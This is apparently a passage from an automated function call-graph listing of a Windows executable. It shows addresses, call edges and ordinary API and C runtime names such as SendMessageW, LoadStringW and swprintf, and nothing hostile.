17544->17545 17546 7ff7390c34de 17545->17546 17562 7ff7390c1834 69 API calls 17561->17562 17563 7ff7390c1a94 17562->17563 17563->17048 17565 7ff7390c19e7 memcpy_s 17564->17565 17566 7ff7390c8dec 69 API calls 17565->17566 17571 7ff7390ca301 17570->17571 17574 7ff7390ca2d0 17570->17574 17574->17571 17593 7ff7390c36ce std::bad_alloc::bad_alloc 17592->17593 17594 7ff7390db514 std::_Xinvalid_argument 2 API calls 17593->17594 17595 7ff7390c36df 17594->17595 17597 7ff7390d96e8 std::_Xinvalid_argument 47 API calls 17596->17597 17598 7ff7390c36f0 17597->17598 17600 7ff7390c612b 17599->17600 17622 7ff7390c5164 17600->17622 17603 7ff7390c6190 LoadStringW 17604 7ff7390c61be 17603->17604 17605 7ff7390c61a9 LoadStringW 17603->17605 17606 7ff7390c3774 17604->17606 17605->17604 17607 7ff7390c3799 swprintf 17606->17607 17859 7ff7390e0ec0 17607->17859 17610 7ff7390d7858 18257 7ff7390d53a0 PeekMessageW 17610->18257 17613 7ff7390d78f7 SendMessageW SendMessageW 17615 7ff7390d793d 17613->17615 17616 7ff7390d7958 SendMessageW SendMessageW SendMessageW 17613->17616 17614 7ff7390d78a9 17619 7ff7390d78b5 ShowWindow SendMessageW SendMessageW 17614->17619 17615->17616 17617 7ff7390d79c2 SendMessageW 17616->17617 17618 7ff7390d799d SendMessageW 17616->17618 17620 7ff7390d98e0 _handle_error 8 API calls 17617->17620 17618->17617 17619->17613 17621 7ff7390d79e6 17620->17621 17621->17243 17629 7ff7390c5054 17622->17629 17626 7ff7390c51c9 17627 7ff7390d98e0 _handle_error 8 API calls 17626->17627 17628 7ff7390c51e2 17627->17628 17628->17603 17628->17604 17630 7ff7390c508a 17629->17630 17638 7ff7390c5120 17629->17638 17632 7ff7390c50b7 17630->17632 17643 7ff7390c96d0 WideCharToMultiByte 17630->17643 17637 7ff7390c50e6 17632->17637 17645 7ff7390c60c0 17632->17645 17633 7ff7390d98e0 _handle_error 8 API calls 17634 7ff7390c5154 17633->17634 17634->17626 17639 7ff7390c51f0 17634->17639 17649 7ff7390e11ec 17637->17649 17638->17633 17640 7ff7390c5212 17639->17640 17642 7ff7390c523a 17639->17642 17641 7ff7390e11ec 31 API calls 17640->17641 17641->17642 17642->17626 17644 7ff7390c9712 17643->17644 17644->17632 17646 7ff7390c60e5 swprintf 17645->17646 17655 7ff7390e0c8c 17646->17655 17650 7ff7390e121c 17649->17650 17651 7ff7390e4850 _set_fmode 15 API calls 17650->17651 17654 7ff7390e1231 17650->17654 17652 7ff7390e1226 17651->17652 17653 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17652->17653 17653->17654 17654->17638 17656 7ff7390e0cd2 17655->17656 17657 7ff7390e0cea 17655->17657 17658 7ff7390e4850 _set_fmode 15 API calls 17656->17658 17657->17656 17659 7ff7390e0cf4 17657->17659 17660 7ff7390e0cd7 17658->17660 17685 7ff7390deec0 17659->17685 17682 7ff7390dea00 17660->17682 17663 7ff7390d98e0 _handle_error 8 API calls 17665 7ff7390c6105 17663->17665 17664 7ff7390e0d05 memcpy_s 17693 7ff7390dedc4 17664->17693 17665->17637 17670 7ff7390e0db0 17673 7ff7390e0e08 17670->17673 17674 7ff7390e0dbf 17670->17674 17675 7ff7390e0e2c 17670->17675 17676 7ff7390e0db6 17670->17676 17671 7ff7390e0d81 17672 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17671->17672 17681 7ff7390e0ce2 17672->17681 17677 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17673->17677 17679 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17674->17679 17675->17673 17678 7ff7390e0e36 17675->17678 17676->17673 17676->17674 17677->17681 17680 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17678->17680 17679->17681 17680->17681 17681->17663 17683 7ff7390de958 _invalid_parameter_noinfo_noreturn 31 API calls 17682->17683 17684 7ff7390dea19 17683->17684 17684->17681 17686 7ff7390deed6 17685->17686 17687 7ff7390deedb 17685->17687 17686->17664 17687->17686 17712 7ff7390e4540 GetLastError 17687->17712 17689 7ff7390deef8 17732 7ff7390e4c18 17689->17732 17694 7ff7390e4850 _set_fmode 15 API calls 17693->17694 17695 7ff7390dee33 17694->17695 17696 7ff7390df0c4 17695->17696 17697 7ff7390df0e0 17696->17697 17698 7ff7390df0f8 17696->17698 17699 7ff7390e4850 _set_fmode 15 API calls 17697->17699 17698->17697 17709 7ff7390df0ff 17698->17709 17700 7ff7390df0e5 17699->17700 17701 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17700->17701 17702 7ff7390df0f0 17701->17702 17702->17670 17702->17671 17703 7ff7390df2b2 17704 7ff7390e4850 _set_fmode 15 API calls 17703->17704 17705 7ff7390df2b7 17704->17705 17707 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17705->17707 17707->17702 17709->17702 17709->17703 17771 7ff7390df970 17709->17771 17787 7ff7390df650 17709->17787 17809 7ff7390defc0 17709->17809 17812 7ff7390df544 17709->17812 17713 7ff7390e455d 17712->17713 17714 7ff7390e4562 17712->17714 17715 7ff7390e6784 abort 6 API calls 17713->17715 17716 7ff7390e6b24 abort 15 API calls 17714->17716 17717 7ff7390e45ab 17714->17717 17715->17714 17719 7ff7390e4579 17716->17719 17720 7ff7390e45c6 SetLastError 17717->17720 17721 7ff7390e45b0 SetLastError 17717->17721 17718 7ff7390e4581 17724 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17718->17724 17719->17718 17722 7ff7390e67dc abort 6 API calls 17719->17722 17740 7ff7390e4100 17720->17740 17721->17689 17725 7ff7390e4598 17722->17725 17727 7ff7390e4588 17724->17727 17725->17718 17728 7ff7390e459f 17725->17728 17727->17720 17729 7ff7390e42e8 abort 15 API calls 17728->17729 17730 7ff7390e45a4 17729->17730 17731 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17730->17731 17731->17717 17733 7ff7390def1c 17732->17733 17734 7ff7390e4c2d 17732->17734 17736 7ff7390e4c4c 17733->17736 17734->17733 17749 7ff7390e8d60 17734->17749 17737 7ff7390e4c61 17736->17737 17738 7ff7390e4c74 17736->17738 17737->17738 17760 7ff7390e7878 17737->17760 17738->17686 17741 7ff7390e7f98 abort EnterCriticalSection LeaveCriticalSection 17740->17741 17742 7ff7390e4109 17741->17742 17743 7ff7390e4118 17742->17743 17744 7ff7390e7fe8 abort 34 API calls 17742->17744 17745 7ff7390e4121 IsProcessorFeaturePresent 17743->17745 17748 7ff7390e414a abort 17743->17748 17744->17743 17746 7ff7390e412f 17745->17746 17747 7ff7390de7f4 abort 14 API calls 17746->17747 17747->17748 17750 7ff7390e4540 abort 35 API calls 17749->17750 17751 7ff7390e8d6f 17750->17751 17752 7ff7390e8dc1 17751->17752 17753 7ff7390e64b8 abort EnterCriticalSection 17751->17753 17752->17733 17754 7ff7390e8d96 17753->17754 17755 7ff7390e8dd0 _snwprintf 15 API calls 17754->17755 17756 7ff7390e8daa 17755->17756 17757 7ff7390e6518 abort LeaveCriticalSection 17756->17757 17758 7ff7390e8db7 17757->17758 17758->17752 17759 7ff7390e4100 abort 35 API calls 17758->17759 17759->17752 17761 7ff7390e4540 abort 35 API calls 17760->17761 17762 7ff7390e7887 17761->17762 17763 7ff7390e78a2 17762->17763 17764 7ff7390e64b8 abort EnterCriticalSection 17762->17764 17765 7ff7390e7928 17763->17765 17768 7ff7390e4100 abort 35 API calls 17763->17768 17769 7ff7390e78b5 17764->17769 17765->17738 17766 7ff7390e78f2 17767 7ff7390e6518 abort LeaveCriticalSection 17766->17767 17767->17763 17768->17765 17769->17766 17770 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17769->17770 17770->17766 17772 7ff7390df9f7 17771->17772 17782 7ff7390df99a 17771->17782 17773 7ff7390df9fc 17772->17773 17774 7ff7390dfa7b 17772->17774 17776 7ff7390dfa61 17773->17776 17780 7ff7390dfa06 17773->17780 17835 7ff7390dffb8 17774->17835 17823 7ff7390e0714 17776->17823 17777 7ff7390df9d8 17786 7ff7390dfa84 _snwprintf 17777->17786 17819 7ff7390e0418 17777->17819 17784 7ff7390df9e8 _snwprintf 17780->17784 17780->17786 17829 7ff7390e0574 17780->17829 17782->17774 17782->17777 17782->17780 17783 7ff7390df9ca 17782->17783 17782->17784 17782->17786 17783->17774 17783->17777 17783->17784 17784->17786 17843 7ff7390e0948 17784->17843 17786->17709 17788 7ff7390df674 17787->17788 17789 7ff7390df65b 17787->17789 17791 7ff7390e4850 _set_fmode 15 API calls 17788->17791 17795 7ff7390df698 17788->17795 17790 7ff7390df9f7 17789->17790 17789->17795 17803 7ff7390df99a 17789->17803 17792 7ff7390df9fc 17790->17792 17793 7ff7390dfa7b 17790->17793 17794 7ff7390df68d 17791->17794 17798 7ff7390dfa61 17792->17798 17802 7ff7390dfa06 17792->17802 17797 7ff7390dffb8 _snwprintf 43 API calls 17793->17797 17796 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17794->17796 17795->17709 17796->17795 17806 7ff7390df9e8 _snwprintf 17797->17806 17800 7ff7390e0714 _snwprintf 31 API calls 17798->17800 17799 7ff7390df9d8 17801 7ff7390e0418 _snwprintf 37 API calls 17799->17801 17808 7ff7390dfa84 _snwprintf 17799->17808 17800->17806 17801->17806 17804 7ff7390e0574 _snwprintf 31 API calls 17802->17804 17802->17806 17802->17808 17803->17793 17803->17799 17803->17802 17805 7ff7390df9ca 17803->17805 17803->17806 17803->17808 17804->17806 17805->17793 17805->17799 17805->17806 17807 7ff7390e0948 _snwprintf 37 API calls 17806->17807 17806->17808 17807->17808 17808->17709 17849 7ff7390e48d0 17809->17849 17853 7ff7390df5b8 17812->17853 17815 7ff7390df558 17815->17709 17816 7ff7390e4850 _set_fmode 15 API calls 17817 7ff7390df5a5 17816->17817 17818 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17817->17818 17818->17815 17820 7ff7390e0434 _snwprintf 17819->17820 17821 7ff7390e047d 17820->17821 17822 7ff7390e4c04 _snwprintf 37 API calls 17820->17822 17821->17784 17822->17821 17827 7ff7390e073c _snwprintf 17823->17827 17824 7ff7390e4850 _set_fmode 15 API calls 17825 7ff7390e0745 17824->17825 17826 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17825->17826 17828 7ff7390e0750 17826->17828 17827->17824 17827->17828 17828->17784 17830 7ff7390e0595 17829->17830 17831 7ff7390e4850 _set_fmode 15 API calls 17830->17831 17834 7ff7390e05e0 _snwprintf 17830->17834 17832 7ff7390e05d5 17831->17832 17833 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17832->17833 17833->17834 17834->17784 17836 7ff7390dffd0 17835->17836 17837 7ff7390deaa0 swprintf 16 API calls 17836->17837 17838 7ff7390e000f 17837->17838 17839 7ff7390e56b8 swprintf 35 API calls 17838->17839 17840 7ff7390e00ee 17839->17840 17841 7ff7390def50 swprintf 43 API calls 17840->17841 17842 7ff7390e010b 17840->17842 17841->17842 17842->17784 17842->17842 17844 7ff7390e09d5 _snwprintf 17843->17844 17848 7ff7390e096f _snwprintf 17843->17848 17845 7ff7390d98e0 _handle_error 8 API calls 17844->17845 17847 7ff7390e0a0d 17845->17847 17846 7ff7390e4c04 _snwprintf 37 API calls 17846->17848 17847->17786 17848->17844 17848->17846 17850 7ff7390e48e9 swprintf 17849->17850 17851 7ff7390e1e14 _snwprintf 39 API calls 17850->17851 17852 7ff7390df001 17851->17852 17852->17709 17854 7ff7390df554 17853->17854 17855 7ff7390df5de 17853->17855 17854->17815 17854->17816 17855->17854 17856 7ff7390e4850 _set_fmode 15 API calls 17855->17856 17857 7ff7390df637 17856->17857 17858 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17857->17858 17858->17854 17860 7ff7390e0f06 17859->17860 17861 7ff7390e0f1e 17859->17861 17863 7ff7390e4850 _set_fmode 15 API calls 17860->17863 17861->17860 17862 7ff7390e0f28 17861->17862 17864 7ff7390deec0 _snwprintf 35 API calls 17862->17864 17865 7ff7390e0f0b 17863->17865 17866 7ff7390e0f39 memcpy_s 17864->17866 17867 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17865->17867 17886 7ff7390dee40 17866->17886 17868 7ff7390e0f16 17867->17868 17869 7ff7390d98e0 _handle_error 8 API calls 17868->17869 17870 7ff7390c37b5 17869->17870 17870->17610 17875 7ff7390e0fe4 17878 7ff7390e103c 17875->17878 17879 7ff7390e0ff3 17875->17879 17880 7ff7390e1062 17875->17880 17883 7ff7390e0fea 17875->17883 17876 7ff7390e0fb5 17877 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17876->17877 17877->17868 17884 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17878->17884 17882 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17879->17882 17880->17878 17881 7ff7390e106c 17880->17881 17885 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17881->17885 17882->17868 17883->17878 17883->17879 17884->17868 17885->17868 17887 7ff7390e4850 _set_fmode 15 API calls 17886->17887 17888 7ff7390deeb2 17887->17888 17889 7ff7390df2c8 17888->17889 17890 7ff7390df2ef 17889->17890 17891 7ff7390df307 17889->17891 17892 7ff7390e4850 _set_fmode 15 API calls 17890->17892 17891->17890 17901 7ff7390df30d 17891->17901 17893 7ff7390df2f4 17892->17893 17895 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17893->17895 17894 7ff7390df2ff 17894->17875 17894->17876 17895->17894 17896 7ff7390df52d 17897 7ff7390e4850 _set_fmode 15 API calls 17896->17897 17898 7ff7390df532 17897->17898 17899 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17898->17899 17899->17894 17901->17894 17901->17896 17904 7ff7390dfbec 17901->17904 17922 7ff7390df7cc 17901->17922 17946 7ff7390df044 17901->17946 17905 7ff7390dfc8a 17904->17905 17916 7ff7390dfc2f 17904->17916 17906 7ff7390dfc8f 17905->17906 17907 7ff7390dfd0e 17905->17907 17910 7ff7390dfcf4 17906->17910 17914 7ff7390dfc99 17906->17914 17953 7ff7390e01d4 17907->17953 17909 7ff7390dfc6b 17921 7ff7390dfd17 swprintf 17909->17921 17949 7ff7390e04cc 17909->17949 17912 7ff7390e0714 _snwprintf 31 API calls 17910->17912 17919 7ff7390dfc7b swprintf 17912->17919 17913 7ff7390e0574 _snwprintf 31 API calls 17913->17919 17914->17913 17914->17919 17914->17921 17915 7ff7390d98e0 _handle_error 8 API calls 17918 7ff7390dfe97 17915->17918 17916->17907 17916->17909 17916->17914 17917 7ff7390dfc5d 17916->17917 17916->17919 17916->17921 17917->17907 17917->17909 17917->17919 17918->17901 17919->17921 17961 7ff7390e0a20 17919->17961 17921->17915 17923 7ff7390df7f0 17922->17923 17924 7ff7390df7d7 17922->17924 17927 7ff7390e4850 _set_fmode 15 API calls 17923->17927 17932 7ff7390df817 17923->17932 17925 7ff7390dfc2f 17924->17925 17926 7ff7390dfc8a 17924->17926 17924->17932 17929 7ff7390dfd0e 17925->17929 17935 7ff7390dfc99 17925->17935 17937 7ff7390dfd17 swprintf 17925->17937 17941 7ff7390dfc5d 17925->17941 17943 7ff7390dfc6b 17925->17943 17944 7ff7390dfc7b swprintf 17925->17944 17928 7ff7390dfc8f 17926->17928 17926->17929 17930 7ff7390df80c 17927->17930 17934 7ff7390dfcf4 17928->17934 17928->17935 17931 7ff7390e01d4 swprintf 43 API calls 17929->17931 17933 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17930->17933 17931->17944 17932->17901 17933->17932 17938 7ff7390e0714 _snwprintf 31 API calls 17934->17938 17935->17937 17939 7ff7390e0574 _snwprintf 31 API calls 17935->17939 17935->17944 17936 7ff7390e04cc swprintf 37 API calls 17936->17944 17940 7ff7390d98e0 _handle_error 8 API calls 17937->17940 17938->17944 17939->17944 17942 7ff7390dfe97 17940->17942 17941->17929 17941->17943 17941->17944 17942->17901 17943->17936 17943->17937 17944->17937 17945 7ff7390e0a20 swprintf 37 API calls 17944->17945 17945->17937 18228 7ff7390e4900 17946->18228 17950 7ff7390e04ff swprintf 17949->17950 17952 7ff7390e0533 17950->17952 17965 7ff7390e4930 17950->17965 17952->17919 17954 7ff7390e01f8 17953->17954 17980 7ff7390deaa0 17954->17980 17960 7ff7390e033e 17960->17919 17963 7ff7390e0acd swprintf 17961->17963 17964 7ff7390e0a43 17961->17964 17962 7ff7390e4930 swprintf 37 API calls 17962->17964 17963->17921 17964->17962 17964->17963 17966 7ff7390e495a 17965->17966 17967 7ff7390e4964 17965->17967 17966->17967 17968 7ff7390deec0 _snwprintf 35 API calls 17966->17968 17967->17952 17969 7ff7390e4997 17968->17969 17969->17967 17977 7ff7390e6030 17969->17977 17972 7ff7390e49d0 17974 7ff7390e4a0d 17972->17974 17975 7ff7390e49e3 MultiByteToWideChar 17972->17975 17973 7ff7390e4a21 MultiByteToWideChar 17973->17967 17973->17974 17974->17967 17976 7ff7390e4850 _set_fmode 15 API calls 17974->17976 17975->17967 17975->17974 17976->17967 17978 7ff7390deec0 _snwprintf 35 API calls 17977->17978 17979 7ff7390e49c7 17978->17979 17979->17972 17979->17973 17981 7ff7390deacd 17980->17981 17984 7ff7390deadc 17980->17984 17982 7ff7390e4850 _set_fmode 15 API calls 17981->17982 17983 7ff7390dead2 17982->17983 17990 7ff7390e56b8 17983->17990 17984->17983 18022 7ff7390e4870 17984->18022 17987 7ff7390deb1c 17989 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17987->17989 17988 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 17988->17987 17989->17983 17991 7ff7390e56e5 17990->17991 17992 7ff7390e56fd 17990->17992 17993 7ff7390e4850 _set_fmode 15 API calls 17991->17993 17992->17991 17996 7ff7390e5714 swprintf 17992->17996 17994 7ff7390e56ea 17993->17994 17995 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 17994->17995 18007 7ff7390e0321 17995->18007 17998 7ff7390e5768 17996->17998 18001 7ff7390e5747 17996->18001 17997 7ff7390e58a4 18146 7ff7390e4ce8 17997->18146 17998->17997 17999 7ff7390e586b 17998->17999 18002 7ff7390e57e1 17998->18002 18006 7ff7390e57a5 17998->18006 18009 7ff7390e5797 17998->18009 18139 7ff7390e5048 17999->18139 18029 7ff7390e5574 18001->18029 18072 7ff7390e93d0 18002->18072 18062 7ff7390e543c 18006->18062 18007->17960 18015 7ff7390def50 18007->18015 18009->17999 18012 7ff7390e57a0 18009->18012 18012->18002 18012->18006 18197 7ff7390e2c54 18015->18197 18017 7ff7390def68 18018 7ff7390def7c 18017->18018 18201 7ff7390e4724 18017->18201 18020 7ff7390e2c54 swprintf 43 API calls 18018->18020 18021 7ff7390def84 18020->18021 18021->17960 18023 7ff7390e48bb 18022->18023 18027 7ff7390e487f abort 18022->18027 18024 7ff7390e4850 _set_fmode 15 API calls 18023->18024 18026 7ff7390deb08 18024->18026 18025 7ff7390e48a2 HeapAlloc 18025->18026 18025->18027 18026->17987 18026->17988 18027->18023 18027->18025 18028 7ff7390e2cb4 abort 2 API calls 18027->18028 18028->18027 18030 7ff7390e55a2 18029->18030 18032 7ff7390e55c0 18029->18032 18031 7ff7390d98e0 _handle_error 8 API calls 18030->18031 18033 7ff7390e55b7 18031->18033 18156 7ff7390e4158 18032->18156 18033->18007 18036 7ff7390e56a0 18037 7ff7390dea50 _invalid_parameter_noinfo_noreturn 16 API calls 18036->18037 18039 7ff7390e56b5 18037->18039 18038 7ff7390e56e5 18039->18038 18044 7ff7390e5714 swprintf 18039->18044 18063 7ff7390e93d0 swprintf 31 API calls 18062->18063 18064 7ff7390e5480 18063->18064 18065 7ff7390e8e38 swprintf 31 API calls 18064->18065 18066 7ff7390e54b9 18065->18066 18067 7ff7390e54bd 18066->18067 18068 7ff7390e551b 18066->18068 18070 7ff7390e54df 18066->18070 18067->18007 18165 7ff7390e5118 18068->18165 18071 7ff7390e52f4 swprintf 35 API calls 18070->18071 18071->18067 18073 7ff7390e941e fegetenv swprintf 18072->18073 18074 7ff7390e948b 18073->18074 18077 7ff7390e94b2 swprintf 18073->18077 18075 7ff7390e4158 __std_exception_copy 31 API calls 18074->18075 18076 7ff7390e94a5 18075->18076 18078 7ff7390e94ad 18076->18078 18090 7ff7390ea61e swprintf 18076->18090 18079 7ff7390e94d1 18077->18079 18080 7ff7390ea680 18077->18080 18087 7ff7390dea50 _invalid_parameter_noinfo_noreturn 16 API calls 18078->18087 18081 7ff7390ea661 18079->18081 18082 7ff7390e94da 18079->18082 18083 7ff7390e4158 __std_exception_copy 31 API calls 18080->18083 18088 7ff7390e4158 __std_exception_copy 31 API calls 18081->18088 18084 7ff7390e94e3 18082->18084 18085 7ff7390ea642 18082->18085 18089 7ff7390ea696 18083->18089 18091 7ff7390ea623 18084->18091 18107 7ff7390e94ec memcpy_s swprintf 18084->18107 18093 7ff7390e4158 __std_exception_copy 31 API calls 18085->18093 18086 7ff7390d98e0 _handle_error 8 API calls 18092 7ff7390e580b 18086->18092 18094 7ff7390ea63d 18087->18094 18095 7ff7390ea677 18088->18095 18089->18090 18096 7ff7390ea725 18089->18096 18090->18086 18100 7ff7390e4158 __std_exception_copy 31 API calls 18091->18100 18127 7ff7390e8e38 18092->18127 18098 7ff7390ea658 18093->18098 18104 7ff7390dea50 _invalid_parameter_noinfo_noreturn 16 API calls 18094->18104 18095->18090 18099 7ff7390ea67b 18095->18099 18097 7ff7390dea50 _invalid_parameter_noinfo_noreturn 16 API calls 18096->18097 18102 7ff7390ea73a 18097->18102 18098->18090 18103 7ff7390ea65c 18098->18103 18105 7ff7390dea50 _invalid_parameter_noinfo_noreturn 16 API calls 18099->18105 18101 7ff7390ea639 18100->18101 18101->18090 18101->18094 18106 7ff7390dea50 _invalid_parameter_noinfo_noreturn 16 API calls 18103->18106 18104->18103 18105->18096 18106->18099 18108 7ff7390e4850 _set_fmode 15 API calls 18107->18108 18113 7ff7390e95e8 BuildCatchObjectHelperInternal 18107->18113 18109 7ff7390e9a8c 18108->18109 18110 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 18109->18110 18110->18113 18111 7ff7390e9aac memcpy_s BuildCatchObjectHelperInternal 18115 7ff7390e9e9a 18111->18115 18118 7ff7390e4850 15 API calls _set_fmode 18111->18118 18124 7ff7390dea00 31 API calls _invalid_parameter_noinfo 18111->18124 18113->18111 18121 7ff7390e9f6a memcpy_s BuildCatchObjectHelperInternal 18113->18121 18117 7ff7390ea3a5 18115->18117 18118->18111 18120 7ff7390e4850 15 API calls _set_fmode 18120->18121 18121->18115 18121->18117 18121->18120 18122 7ff7390dea00 31 API calls _invalid_parameter_noinfo 18121->18122 18122->18121 18124->18111 18128 7ff7390e8e45 18127->18128 18129 7ff7390e8e5d 18127->18129 18129->18128 18140 7ff7390e93d0 swprintf 31 API calls 18139->18140 18141 7ff7390e5084 18140->18141 18142 7ff7390e8e38 swprintf 31 API calls 18141->18142 18143 7ff7390e50ba 18142->18143 18144 7ff7390e50be 18143->18144 18145 7ff7390e5118 swprintf 35 API calls 18143->18145 18144->18007 18145->18144 18147 7ff7390deec0 _snwprintf 35 API calls 18146->18147 18148 7ff7390e4d35 18147->18148 18149 7ff7390e4d56 18148->18149 18150 7ff7390e4d40 18148->18150 18153 7ff7390e5048 swprintf 35 API calls 18149->18153 18155 7ff7390e4d51 memcpy_s swprintf 18149->18155 18151 7ff7390e4850 _set_fmode 15 API calls 18150->18151 18152 7ff7390e4d45 18151->18152 18154 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 18152->18154 18153->18155 18154->18155 18155->18007 18157 7ff7390e4165 18156->18157 18158 7ff7390e416f 18156->18158 18157->18158 18162 7ff7390e418a 18157->18162 18159 7ff7390e4850 _set_fmode 15 API calls 18158->18159 18164 7ff7390e4176 18159->18164 18160 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 18161 7ff7390e4182 18160->18161 18161->18030 18161->18036 18162->18161 18163 7ff7390e4850 _set_fmode 15 API calls 18162->18163 18163->18164 18164->18160 18166 7ff7390e514f 18165->18166 18167 7ff7390e517d 18165->18167 18168 7ff7390e4850 _set_fmode 15 API calls 18166->18168 18169 7ff7390deec0 _snwprintf 35 API calls 18167->18169 18198 7ff7390e2c62 18197->18198 18199 7ff7390e2c69 18197->18199 18207 7ff7390e29d4 18198->18207 18199->18017 18202 7ff7390e4737 18201->18202 18204 7ff7390e475f 18201->18204 18203 7ff7390deec0 _snwprintf 35 API calls 18202->18203 18205 7ff7390e4743 18203->18205 18204->18017 18205->18204 18219 7ff7390e5eb8 18205->18219 18208 7ff7390deec0 _snwprintf 35 API calls 18207->18208 18209 7ff7390e29f2 18208->18209 18210 7ff7390e2a32 18209->18210 18211 7ff7390e29fa 18209->18211 18213 7ff7390e2a57 18210->18213 18215 7ff7390e6030 swprintf 35 API calls 18210->18215 18212 7ff7390e2984 swprintf 39 API calls 18211->18212 18218 7ff7390e2a05 18212->18218 18214 7ff7390e4850 _set_fmode 15 API calls 18213->18214 18216 7ff7390e2a5b 18213->18216 18214->18216 18215->18213 18218->18199 18229 7ff7390e4919 swprintf 18228->18229 18232 7ff7390e2128 18229->18232 18233 7ff7390e2155 18232->18233 18234 7ff7390e217b 18232->18234 18235 7ff7390e4850 _set_fmode 15 API calls 18233->18235 18234->18233 18236 7ff7390e2189 18234->18236 18237 7ff7390e215a 18235->18237 18238 7ff7390deec0 _snwprintf 35 API calls 18236->18238 18239 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 18237->18239 18241 7ff7390e2196 18238->18241 18252 7ff7390df083 18239->18252 18242 7ff7390e21cd 18241->18242 18253 7ff7390e5e48 18241->18253 18243 7ff7390e243b 18242->18243 18244 7ff7390e4850 _set_fmode 15 API calls 18242->18244 18246 7ff7390e4850 _set_fmode 15 API calls 18243->18246 18249 7ff7390e270f _snwprintf 18243->18249 18245 7ff7390e247f 18244->18245 18247 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 18245->18247 18248 7ff7390e2704 18246->18248 18247->18243 18250 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 18248->18250 18251 7ff7390e4850 _set_fmode 15 API calls 18249->18251 18249->18252 18250->18249 18251->18252 18252->17901 18254 7ff7390e5e63 18253->18254 18256 7ff7390e5e5f 18253->18256 18255 7ff7390e5e7d GetStringTypeW 18254->18255 18254->18256 18255->18256 18256->18241 18258 7ff7390d5404 GetDlgItem 18257->18258 18259 7ff7390d53c0 GetMessageW 18257->18259 18258->17613 18258->17614 18260 7ff7390d53df IsDialogMessageW 18259->18260 18261 7ff7390d53ee TranslateMessage DispatchMessageW 18259->18261 18260->18258 18260->18261 18261->18258 18263 7ff7390db5d5 18262->18263 18264 7ff7390db60a 18262->18264 18263->18264 18265 7ff7390e4158 __std_exception_copy 31 API calls 18263->18265 18264->17263 18265->18264 18267 7ff7390da1e6 std::bad_alloc::bad_alloc 18266->18267 18268 7ff7390db514 std::_Xinvalid_argument 2 API calls 18267->18268 18269 7ff7390da1f7 18268->18269 18271 7ff7390cda04 18270->18271 18273 7ff7390cd960 BuildCatchObjectHelperInternal 18270->18273 18271->17280 18273->18271 18274 7ff7390cd9ea 18273->18274 18276 7ff7390cdcc8 18273->18276 18293 7ff7390c1d50 18274->18293 18277 7ff7390cdce0 _snwprintf 18276->18277 18298 7ff7390c2740 18277->18298 18422 7ff7390c8d02 18421->18422 18423 7ff7390c8d87 18421->18423 18430 7ff7390c3b10 18422->18430 18425 7ff7390d98e0 _handle_error 8 API calls 18423->18425 18427 7ff7390c8c8b 18425->18427 18427->17104 18431 7ff7390c3b34 GetVersionExW 18430->18431 18432 7ff7390c3b67 18430->18432 18431->18432 18433 7ff7390d98e0 _handle_error 8 API calls 18432->18433 18460 7ff7390c13c8 18435->18460 18461 7ff7390c13e4 _snwprintf 18460->18461 18462 7ff7390c40e0 8 API calls 18461->18462 18477 7ff7390c1dab 18476->18477 18480 7ff7390c1dc2 18476->18480 18484 7ff7390c1834 18477->18484 18482 7ff7390db514 std::_Xinvalid_argument 2 API calls 18480->18482 18483 7ff7390c1de8 18482->18483 18485 7ff7390c188b memcpy_s 18484->18485 18491 7ff7390cd84e _snwprintf 18490->18491 18492 7ff7390c37fc 15 API calls 18491->18492 18494 7ff7390cd892 18492->18494 18585 7ff7390c25e8 18500->18585 18537 7ff7390c2a10 75 API calls 18530->18537 18531 7ff7390c238b 18538 7ff7390c2900 77 API calls 18531->18538 18537->18531 18555->17370 18591 7ff7390c25f9 _snwprintf 18585->18591 18746 7ff7390ca58d 18745->18746 18747 7ff7390ca6aa 18745->18747 18749 7ff7390ca5e1 18746->18749 18750 7ff7390ca5fb 18746->18750 18751 7ff7390ca6af 18746->18751 18762 7ff7390c7254 18747->18762 18752 7ff7390c2c38 47 API calls 18749->18752 18750->18749 18753 7ff7390ca62a 18750->18753 18754 7ff7390c36c0 Concurrency::cancel_current_task 2 API calls 18751->18754 18765 7ff7390d96e8 18762->18765 18776 7ff7390c9c6c 18775->18776 18779 7ff7390c9bd8 18775->18779 18777 7ff7390c36e0 47 API calls 18776->18777 18778 7ff7390c9c71 18777->18778 18780 7ff7390c9c31 18779->18780 18781 7ff7390c9c02 18779->18781 18783 7ff7390c9beb BuildCatchObjectHelperInternal 18779->18783 18780->18783 18784 7ff7390d999c 4 API calls 18780->18784 18782 7ff7390c2c38 47 API calls 18781->18782 18782->18783 18783->17409 18784->18783 18799 7ff7390d999c 4 API calls 18798->18799 18800 7ff7390c99e8 18799->18800 18804 